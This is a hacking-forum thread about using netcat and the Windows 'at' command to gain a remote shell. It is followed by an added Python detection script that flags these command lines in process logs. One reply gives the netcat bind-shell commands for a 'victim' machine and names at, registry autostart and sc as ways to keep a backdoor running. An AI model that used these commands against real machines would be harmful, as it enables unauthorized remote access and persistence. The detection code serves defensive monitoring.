Benny1123

Netcat and at command

7 posts in this topic

Does anyone know how to use netcat and the at command to exploit a remote computer? Perhaps somehow it might be possible to telnet from the victim's computer by scheduling it with the at command on your own computer?


Knowing how to do your own research will pay off in the end... Search online for any and every bit of documentation on the subject of netcat... I think that once you master this tool to its full extent it will be like wetting your pickle for the first time...

The at command is what you use with Windows to schedule tasks...

Edited by 1qwert

> Knowing how to do your own research will pay off in the end... Search online for any and every bit of documentation on the subject of netcat...

I have.... and have found results, but not to the extent of what I am asking.....

> The at command is what you use with Windows to schedule tasks...

Yes.... A computer can use the at command to run an application on a remote computer. The benefit of this is that it is a Microsoft service. It can also be started remotely if not already started, and nothing will alert the user because hey, it's using a Microsoft tool. The idea behind this is to not upload anything on the target's machine, just use the at command to schedule the computer to telnet to your machine and let netcat listen for the connection.


I think you're thinking about "remote" too "remotely." The AT command will work on remote computers on the same network as yourself, generally within the same domain. Run->cmd-> at \\[network path and name of computer].

If you are not on the same network (even a basic home peer-to-peer will let you use the at command), then you need to remote in, which it is highly unlikely that any hackable network will have enabled for you, and run those commands yourself. If you are this far already, then you have complete access to this machine with all of its security privileges and have already hacked it, so you could telnet, run malicious code, etc., as far as the machine's security privileges allow.

I don't know what you mean about using netcap. You seem to be tying AT and netcap together too strongly. Netcap will let you make your own packets but you can't force a target machine to accept a packet or do what the packet wants the machine to do...again on any well protected machine...less protected machines have known flaws which you can play around with.

Hope that helps...

-----Phail_Saph-----


Moved to Nubie HQ.

In order for something like you have described to work, you would need to run netcat on the remote machine and then initiate a connection from your own machine; you have explained it the other way around. There are plenty of how-to guides on doing something like this -- in fact, I believe the exact process is described in the netcat docs.

The "at" command is just a task scheduler for Windows. It has nothing at all to do with what you're describing, at least not directly.


AT commands can also refer to modem control commands. Like going into the serial comm of a GSM baseband modem and playing with AT Commands :D


A hacker will use the AT command to schedule tasks; this is one way of keeping your trojan, shell or backdoor always running on the client...

A hacker will use the registry to keep a trojan, shell or backdoor starting up when Windows first boots up...

A hacker will also use the SC command to start a trojan up as a service...

Here is a small set of instructions for you, that is, if you don't know how to use netcat as a remote control... You need 2 computers for this... Both computers need netcat located somewhere on the hard drive (at least the victim does)...

For this test, place netcat on computer 1 in this directory: c:/hacked/nc.exe. This will be your victim.

On the victim computer, open a command prompt and execute these 3 commands:

ipconfig

cd/hacked/

nc -l -p 666 -e cmd.exe -d

This will start netcat in a stealthy way; if you check the Task Manager you will see netcat is running...

Now, from the attacking computer you need to execute this command; take note of the IP address from the victim's ipconfig:

telnet 192.168.1.5 666

Netcat is your remote control (shell, backdoor). You need to understand why you would need to use one of the tools above to keep netcat running...
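
From the defender's side, everything named in this thread (a netcat listener started with -e, tasks scheduled with at, services created with sc, registry autostart entries) shows up as a process command line in process-creation logs. The following is an added example, not part of any post: a small matcher run over constructed sample events. The rule names, host names and sample lines are made up for illustration, and the CurrentVersion\Run key is an assumption about which registry location the post means.

```python
import re

# One rule per technique mentioned in the thread. Rule names are this
# example's own labels, not names from any product.
RULES = {
    # nc with both a listen flag and -e <program>: a shell handed to any caller
    "netcat_listener_exec": re.compile(
        r"\b(?:nc|ncat|netcat)(?:\.exe)?\b(?=.*\s-[a-z]*l)(?=.*\s-[a-z]*e\s+\S)",
        re.I),
    # at [\\HOST] HH:MM ...: a task scheduled locally or on another machine
    "at_schedule": re.compile(
        r"\bat(?:\.exe)?\s+(?:\\\\[\w.-]+\s+)?\d{1,2}:\d{2}", re.I),
    # sc [\\HOST] create ...: a new service being registered
    "sc_service_create": re.compile(
        r"\bsc(?:\.exe)?\s+(?:\\\\[\w.-]+\s+)?create\s", re.I),
    # reg add ...\CurrentVersion\Run: an autostart entry (assumed location)
    "registry_run_key": re.compile(
        r"\breg(?:\.exe)?\s+add\s+\S*\\CurrentVersion\\Run(?:Once)?\b", re.I),
}

# Constructed (host, command line) pairs, as a process-creation log would
# record them. The first line is the listener command quoted in the thread.
SAMPLE_EVENTS = [
    ("WS-042", r"c:\hacked\nc.exe -l -p 666 -e cmd.exe -d"),
    ("WS-017", r"at \\WS-042 23:30 telnet 192.0.2.10"),
    ("WS-042", r"sc create updater binPath= c:\hacked\nc.exe"),
    ("WS-042", r"reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
               r" /v updater /d c:\hacked\nc.exe"),
    ("WS-008", r"nc.exe 192.168.1.5 80"),   # plain client use, no -l / -e
    ("WS-008", r"sc query spooler"),        # read-only service query
    ("WS-008", r"reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"),
    ("WS-008", r"ipconfig"),
]

def scan(events):
    """Return (host, rule_name, command_line) for every rule an event matches."""
    hits = []
    for host, cmdline in events:
        for name, rx in RULES.items():
            if rx.search(cmdline):
                hits.append((host, name, cmdline))
    return hits

if __name__ == "__main__":
    for host, rule, cmdline in scan(SAMPLE_EVENTS):
        print(f"{host:8} {rule:22} {cmdline}")
```

The benign lines (a netcat client connection, `sc query`, `reg query`) are left alone because each rule keys on the flag or verb that changes system state, not on the tool name by itself.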
